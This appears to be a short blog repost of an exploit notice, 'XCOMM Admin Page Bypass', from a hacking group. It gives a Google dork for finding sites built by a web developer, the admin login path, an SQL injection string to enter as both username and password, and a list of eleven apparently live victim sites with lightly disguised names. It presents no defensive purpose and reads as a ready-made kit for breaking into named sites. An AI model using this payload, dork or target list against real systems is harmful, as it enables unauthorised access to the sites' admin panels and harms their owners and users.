Header Ads

XCOMM Admin Page Bypass

|+| Exploit Title : XCOMM Admin Page Bypass

|+| Exploit Author : Ashiyane Digital Security Team

|+| Vendor Homepage : http://xcomm.net.pk/

|+| Google Dork : "Designed & Developed by: XCOMM"

|+| Tested On : Windows, Linux

|+| Date: 2015/09/23

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|

|+| Vulnerablity : example.com/admin

|+| Username & Password: '=' 'or

|+| Demo site(s) :

|+| http://fircoXs.coM/admin/

|+| http://greenfieldiXmpex.com/admin/

|+| http://sAgatextilXe.com/admin/

|+| http://www.albXagHinds.com/admin/

|+| http://www.taXjbaDges.com/admin/

[+] http://www.rXoyal-badges.com/admin/

[+] http://www.fjentp.cXom/admin/

[+] http://www.thrIve-inXtl.com/admin/

[+] http://aestHetIcx.cXom/admin/

[+] http://www.mnzsXons.com/admin/

[+] http://www.abiDXastars.com/admin/

No comments

Silahkan Komentar dengan bahasa yang sopan

Powered by Blogger.